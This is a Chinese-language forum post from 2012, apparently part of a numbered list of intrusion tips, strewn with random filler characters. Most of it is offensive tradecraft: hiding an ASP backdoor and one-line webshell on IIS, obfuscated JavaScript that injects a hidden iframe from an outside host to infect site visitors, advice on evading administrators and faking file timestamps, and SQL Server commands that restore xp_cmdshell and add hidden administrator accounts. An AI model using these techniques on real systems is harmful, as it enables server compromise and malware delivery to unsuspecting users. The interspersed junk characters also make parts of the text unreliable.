& X2 k( G n$ y3 c/ b$ X! S2 H; }- o: q
8 W* M# H" F! C* m! |53、隐藏ASP后门的两种方法 m1 t2 e6 v, y6 j+ g/ h
1、建立非标准目录:mkdir images..\
" Q. ]! {5 a& \9 p; y% z `/ |拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
5 q0 ?$ U Q/ {8 P通过web访问ASP木马:http://ip/images../news.asp?action=login" _/ M* K' z0 Y& i
如何删除非标准目录:rmdir images..\ /s& e0 h$ B+ g ]* d
2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:+ ? g/ Y- Y. ]3 `& |4 u
mkdir programme.asp( S0 D; |9 u" n" P! A) A8 P: s
新建1.txt文件内容:<!--#include file=”12.jpg”-->
9 C, V% E- [! p新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件" t: J# I2 O& O4 b( Z9 ~4 z! H
attrib +H +S programme.asp
( I6 s4 z% B7 x通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt `+ N& s9 m% e: _' @; k V5 n5 h z
! c. ?( | d9 C" f
54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。
& [7 D2 T$ f$ ]# r! w S然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
6 p8 r" I* A v# y5 i
+ x8 O0 v4 D: [2 } O& m8 @55、JS隐蔽挂马1 Q" ~/ X5 E7 u
1.
: Q) y. j. O( c$ `" r. nvar tr4c3="<iframe src=ht";
" t1 W) J$ X5 Gtr4c3 = tr4c3+"tp:/";
) a* u; b2 ^; W4 jtr4c3 = tr4c3+"/ww";
& V) c3 O1 _/ _- G }8 q# F0 B2 }! ctr4c3 = tr4c3+"w.tr4";- R+ j0 ]( |* E; u& I2 i
tr4c3 = tr4c3+"c3.com/inc/m";
& ? l- g, M+ M4 Ztr4c3 = tr4c3+"m.htm style="display:none"></i";
E- `2 B' a9 V, q0 P Gtr4c3 =tr4c3+"frame>'";5 F' l7 Q! n! x7 h) G
document.write(tr4c3);
9 ]1 w9 w& d" z避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。
( \/ M5 Z9 t2 H7 Q6 {
# O6 X, ?. g8 J3 [2.
( n" `1 c* a$ k转换进制,然后用EVAL执行。如
; ]! ]* u: Z6 `$ J% Neval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");8 l- H; o& ^! ?' \1 k# \
不过这个有点显眼。
) B4 _ R% [% _: b3.2 s. u1 X- a0 Y9 i. `' q& u
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');$ Q* R3 B& m. Q$ h9 g7 r7 Z8 T1 e( C
最后一点,别忘了把文件的时间也修改下。
' Q5 ^7 P+ Z4 e3 y+ z2 L
' R; U; ?& U: p& [6 \56.3389终端入侵常用DOS命令
2 M0 W5 V; K: V+ t' Ytaskkill taskkill /PID 1248 /t* y/ i; J& l. |+ j1 v0 N) q
B" p3 ~; {% Z) j3 {6 Atasklist 查进程# A# I% q- K, Q, p' e( k4 k
5 ^; m- z: e! G, N% C8 f
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限( P, O* x. L, N8 f9 S) p6 Y
iisreset /reboot
+ X* v) ?& X( Q3 z" K$ dtsshutdn /reboot /delay:1 重起服务器
! j/ k, _( Q7 A$ Z& o8 n5 D' I4 u1 b% U" _3 c( N
logoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
3 V' P$ W/ ~( e- ~$ \" R5 m3 Z- a5 E4 }9 `! V
query user 查看当前终端用户在线情况
2 p* w2 {2 B: k6 E7 T. s
9 ]! k% b5 z! l, G7 M- k要显示有关所有会话使用的进程的信息,请键入:query process ** Y* _. n* d2 O& E7 h
1 C9 ~# U8 q- K6 ~& {" J要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2- L) h$ _& C& ?& m5 g; \- Q
! |! J; U0 a% V# j3 e: K要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
, @2 A$ v% L4 m; @
1 t8 L. ]* q- a2 ?6 w' K要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02
! H6 d2 X N ^% ~5 y% ^
% X; O, @7 C; L命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启
8 \. \; G8 i. r" ]' e! Y( f1 w
* c, m7 r% P( V5 v& l! u8 Q8 ?命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
8 a' o ^7 Q5 ]- a4 `" z0 d
9 ?5 a8 b1 l) s c/ u( q9 ~命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
1 Z: Z5 A" k' O8 f0 y" X* w* D) H" f6 `8 r! X
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机& f3 M0 a) B4 ]7 ]
. c I" D4 g% i, _ R. e* }1 r
56、在地址栏或按Ctrl+O,输入:
, G# i" x4 l3 m! n4 L6 V& Y7 A fjavascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
$ ~" Y+ c, ~! ?8 \; Y* C! d' p9 D9 c4 Q8 e9 A+ T3 `
源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。2 r/ h( ~/ a7 P+ ]
: y5 l; t3 N1 h% D! z57、net user的时候,是不能显示加$的用户,但是如果不处理的话,
2 Z6 }. P9 [$ M3 I! ~6 Y用net localgroup administrators是可以看到管理组下,加了$的用户的。+ b( M6 ?& a. |- }7 b/ o% a
+ d0 `) ^# Q& d" N# P7 T+ P+ j58、 sa弱口令相关命令
, r# s: x& q" U& M" b# m: V
3 O' |( G0 j, \; b- A一.更改sa口令方法:
! t% u) c& y; q用sql综合利用工具连接后,执行命令:
8 {/ q4 P$ d4 v5 w1 Pexec sp_password NULL,'20001001','sa'
% A+ N" r* x8 g(提示:慎用!)% d4 {5 p$ z3 M+ Y0 Y9 c6 j9 n
' N9 q- v" n' M5 C9 [( m二.简单修补sa弱口令.
7 A& J9 q+ a! b6 e5 x; k
5 Y7 {9 m% \2 g& j+ X9 c4 K6 u5 @方法1:查询分离器连接后执行:8 }6 q% N5 W! q" F% r8 n
if exists (select * from# P% L7 G E) V/ u v
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
( O$ n" K! e; G C; C7 DOBJECTPROPERTY(id, N'IsExtendedProc') = 1), ^6 {+ K0 N- O0 P) w5 n
' P3 a! T9 T% o; wexec sp_dropextendedproc N'[dbo].[xp_cmdshell]'
* ~" ^- j8 O( b' q* i
/ G/ k& a0 Z4 P5 y3 t8 TGO+ Y' `7 P) }! J
6 k) b/ z4 u! F9 G i! o然后按F5键命令执行完毕- `3 u6 ^$ Z2 s1 R9 `
( C/ ]6 Z0 l7 Y" o6 x
方法2:查询分离器连接后7 t: D5 H/ t: X
第一步执行:use master
3 ^3 n0 H+ m" N, r第二步执行:sp_dropextendedproc 'xp_cmdshell'
4 b9 P0 B+ N, e: [! h8 y1 X- B6 J然后按F5键命令执行完毕
& V4 c, w- c3 m3 Q2 X& U$ N) S, B
( U3 p3 z0 T3 n3 E
. K( \& h6 d) G0 `2 {, f! X. G- M三.常见情况恢复执行xp_cmdshell.( I+ X7 }' D7 K: }& I6 v4 s
: A& E9 h# R. L( }5 H4 I3 b
6 R5 D' a( n4 n1 ~1 未能找到存储过程'master..xpcmdshell'.
* t1 T; P9 i) E2 N! G/ t' ? 恢复方法:查询分离器连接后,
. ? d0 q. e6 l1 [ A第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
0 O( j) C/ n1 P; p1 S第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'& E) A1 o }6 o1 | ~ k* t
然后按F5键命令执行完毕
! f3 }! @3 N+ p& e( q8 y% }4 Z+ G- n& S- S( O+ C0 X& N
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)/ j, {7 Y, q* B, Z
恢复方法:查询分离器连接后,
% G& A/ B8 z# ]. Y" W, K第一步执行:sp_dropextendedproc "xp_cmdshell"8 w+ h" t; N0 I; v7 P
第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'& w, @' Z) N6 u3 U1 ^
然后按F5键命令执行完毕
; B0 {; G" l7 y5 r
/ Z% Q. x! }! } O; j$ H8 j" @3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)) d, Y$ m+ O) W+ e
恢复方法:查询分离器连接后,# L; v8 M- n8 b: | e
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
: m/ E6 W2 y6 R0 k2 v第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
+ r, X# ^, }* O$ D5 A! Q; b% y1 Q然后按F5键命令执行完毕# B; P2 w: l( q" g
$ J1 A2 u h( J) o) g
四.终极方法.9 K6 U, D% c N1 Z/ ^
如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:8 F+ Z! Z& |$ |6 G
查询分离器连接后,: o9 a' u" o8 b' U) k& d
2000servser系统:
8 X& U; z" H6 A; p' W7 V2 w) E* h3 vdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'
. d9 e2 K/ n, i2 X3 [6 H3 t9 i( G/ z! D, F8 N7 I" V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'" x" N" D2 [, C8 \
% T9 G. Y* f" ?7 w! m$ ~ h
xp或2003server系统:4 b0 v. S" s* q. i0 v
) f# N9 N# u% d. C3 rdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
+ F) d9 x# n4 i3 b3 F2 T
( p1 Z" A5 E! Mdeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'8 Q C6 i' h- k/ ~
|
发表于 2012-9-15 14:51:03
收藏
支持
反对